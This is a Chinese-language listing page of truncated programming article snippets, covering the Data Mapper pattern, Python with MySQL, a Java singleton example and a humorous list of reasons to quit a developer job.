    前面分别介绍了数据源架构模式之表数据入口、数据源架构模式之行和数据入口数据源架构模式之活动记录,相较于这三种数据源架构模式,数据映射器显得更加“高大上”。   一、概念 数据映射器(Data Mapper):在保持对象和数据库(以及映射器本身)彼此独立的情况下,在二者之间移动数据的一个映射器层。概念永远都是抽象的,简单的说,数据映射器就是一个负责将数据映射到对象的类数据。 &nb
  • 在Python中使用MYSQL pda158 mysqlpython
    缘由   近期在折腾一个小东西须要抓取网上的页面。然后进行解析。将结果放到 数据库中。   了解到 Python在这方面有优势,便选用之。   由于我有台 server上面安装有 mysql,自然使用之。在进行数据库的这个操作过程中遇到了不少问题,这里 记录一下,大家共勉。    python中mysql的调用    百度之后能够通过MySQLdb进行数据库操作。
  • 单例模式 hxl1988_0311 java单例设计模式单件
    package com.sosop.designpattern.singleton; /* * 单件模式:保证一个类必须只有一个实例,并提供全局的访问点 * * 所以单例模式必须有私有的构造器,没有私有构造器根本不用谈单件 * * 必须考虑到并发情况下创建了多个实例对象 * */ /** * 虽然有锁,但是只在第一次创建对象的时候加锁,并发时不会存在效率
  • 27种迹象显示你应该辞掉程序员的工作 vipshichg 工作
    1、你仍然在等待老板在2010年答应的要提拔你的暗示。 2、你的上级近10年没有开发过任何代码。 3、老板假装懂你说的这些技术,但实际上他完全不知道你在说什么。 4、你干完的项目6个月后才部署到现场服务器上。 5、时不时的,老板在检查你刚刚完成的工作时,要求按新想法重新开发。 6、而最终这个软件只有12个用户。 7、时间全浪费在办公室政治中,而不是用在开发好的软件上。 8、部署前5分钟才开始测试。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他